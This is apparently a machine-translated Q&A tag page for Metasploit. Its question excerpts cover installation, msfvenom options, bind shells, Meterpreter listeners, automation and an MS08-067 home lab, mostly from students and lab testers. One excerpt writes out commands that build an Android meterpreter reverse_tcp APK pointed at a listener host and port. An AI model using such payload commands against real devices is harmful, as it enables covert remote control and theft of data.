问题标签 [metasploit]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
ruby-on-rails - 找不到有效的宝石“红宝石”
我正在尝试在 Raspberry Pi 模型 B+ 上安装 Metasploit
因为我是 Metasploit 和 Gems 环境的新手,所以我一直在关注此链接中的详细信息在Raspberry 上安装 Metasploit ,在我进行捆绑之前一切正常
所以它说我应该安装 metasploit-concern v 1.0.0
然后我尝试使用以下两个代码gem install metasploit-concern -v '1.0.0'
和gem install metasploit-concern
所以然后我尝试安装 Ruby 2.1 和 ruby
root@raspberrypi:~/msf3# gem install Ruby -v '2.1'
ERROR: Could not find a valid gem 'Ruby' (= 2.1) in any repository
ERROR: Possible alternatives: ruby
root@raspberrypi:~/msf3# gem install ruby
ERROR: Could not find a valid gem 'ruby' (>= 0) in any repository
ERROR: Possible alternatives: ruby
现在你可以看到它是一个漏洞,我被卡住了
ps * 也已经安装了 ruby-dev * 每次都尝试在 ruby 和 ruby 之间切换*在捆绑时它说(使用)而不是(安装),因为我尝试重新运行捆绑以查看它是否可以工作)* 我也尝试采购gem sources -a https://rubygems.org
. 和gem sources -a https://rubygems.org
我试图提供所有可能的信息,也许它有用,也许它不是......以防万一
我将非常感谢您的帮助在此先感谢
干杯班达尔
android - Metasploit 创建的 apk 未安装在 android 设备上
我正在尝试在 android 设备(GT - 19300 和 SGS Tab S 10.5)上安装被黑的 apk。我的问题是,它既没有在我的手机上也没有在我的标签上安装该 apk。它一直说,无法安装该应用程序...手机正在运行 Android 4.3(已root!),Tab 正在运行 Android 5.0.2。我使用以下命令在 metasploit pro 控制台(Windows)上创建了 apk:
使用 android/meterpreter/reverse_tcp
设置 LHOST 192.168.2.107
设置 LPORT 443
生成 -t raw -f //路径
感谢帮助
penetration-testing - 现在 -o 标志不再有效,在 msfvenom 中显示有效负载选项
操作系统: Kali Linux 2.0 在运行 i3 的 Ubuntu MATE 中作为虚拟机 (VirtualBox) 运行。
这是一个相当简单的问题:现在 -o 标志不再在 msfvenom 中提供有效负载选项,是什么取代了它?我查看了 -h 输出并在各个地方尝试了 --payload-options ,但没有任何效果。我确信我遗漏了一些简单的东西,但没有什么能指出我正确的方向,因为所有教程和信息仍然使用 -o 标志。
这是帮助输出的相关部分:
c - 如何使用转发端口连接到远程绑定外壳
我正在尝试解决我的学校提供的缓冲区溢出挑战。服务器上有 ac 程序作为服务暴露在某个端口上,例如 2323
他们还提供了bindshell 端口,例如2525,他们提到他们依赖于guestport 4444 上的TCP-bindshell。即2525 被重定向到我的虚拟机上的端口4444。
我正在使用 metasploit 编写一个漏洞利用程序,但我并不真正理解这里提供给我的 bindshell 的概念。
我尝试了从我的机器到 2525 上的服务器 IP 的 netcat,它说:
如您所见,它打开但不连续收听。
在运行漏洞利用时,我使用 RPORT 作为 2323,但我不明白我应该在哪里提到 bindshell 端口 2525
有谁知道我应该如何进行。如何直接连接到端口 2525 上的 shell,这是不允许的。
python - 用户输入作为变量传递给 subprocess.call
我试图将一个变量传递给另一个正在启动的程序。我遇到了变量工作的问题
这是代码它一直有效,直到通过 RHOST,metasploit 将其作为 %RHOST
我需要在设置 RHOSTS 之后直接传递 RHOST 变量。请帮忙 :)
python - Meterpreter 处理程序/侦听器
我是一名网络安全学生,我不是破解者、scriptkiddy 或类似的东西,我正在研究 python Meterpreter 的侦听器,我找到了一个普通的 tcp 反向处理程序,它正在使用 cmd reverse tpc (metasploit),但是它不适用于meterpreter reverse tpc(metasploit)......有人知道为什么吗?谢谢。
directory - 如何阅读 Metasploit 中的漏洞利用源代码?
正如我在问题标题中所说,如何在 Kali 上的 Metasploit 中读取或访问漏洞利用的源代码?
注意:请不要说“你在 ~/.msf4 下查看了吗”。因为除了空文件夹之外没有任何东西。
metasploit - 如何自动化 Metasploit?
我正在使用以下代码来自动化 Metasploit:
但它不起作用,我收到错误:
client.call('console.write',[console_id,commands]) NameError: name 'client' is not defined
问题是什么?有没有其他可以以类似方式工作的脚本?
database - Metasploit msfrpcd 与数据库
我有一个问题,我想将 Metasploit 框架作为服务运行,但如果使用“msfrpcd”工具,它无法连接数据库。如果我使用 msfconsole 并且“加载 msgrpc”就可以了。那么当我使用“msfrpcd”工具时,你能帮我连接到数据库吗?感谢您的支持。
metasploit - 无法使用 ms08_067_netapi 创建会话
我有一个小型“实验室”试图在家中进行渗透测试,我有我的主操作系统,并且在一个运行 Windows XP SP3 (ENG) 的 VM 上。我使用 ms08_067_netapi 和 reverse_tcp 作为有效载荷。当我使用exploit命令时,这就是我得到的。
我从中可以理解的是,该漏洞利用有效,但有效负载无法运行。我做的第一件事是将端口从 4444 更改为 80,以防万一防火墙阻止了有效负载。我得到了同样的回复,尝试将 80 和 443 作为 LPORT。
你对我还能做什么有什么建议吗?